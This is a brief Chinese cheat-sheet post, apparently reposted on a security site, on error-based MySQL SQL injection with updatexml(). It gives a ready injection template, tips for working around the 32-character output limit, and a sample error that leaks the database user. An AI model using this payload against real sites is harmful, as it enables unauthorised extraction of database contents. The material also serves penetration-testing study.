MySQL updatexml 注入

2023年12月15日00:52:41评论5 views字数 261阅读0分52秒阅读模式

MySQL updatexml 注入

UPDATEXML (XML_document, XPath_string, new_value);

XPath_string: Xpath 语法.

id=1 and updatexml(1,concat(0x7e,(PAYLOAD),0x7e),1)

PAYLOAD 自行替换记得加上 limit.

updatexml() 最大返回 32 位可以用 left() or substr() mid() 来截取后面的内容.

XPATH syntax error:'~root@localhost~'

- By:X1r0z[exp10it.cn]

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2023年12月15日00:52:41
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
MySQL updatexml 注入https://cn-sec.com/archives/2301329.html

目录

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码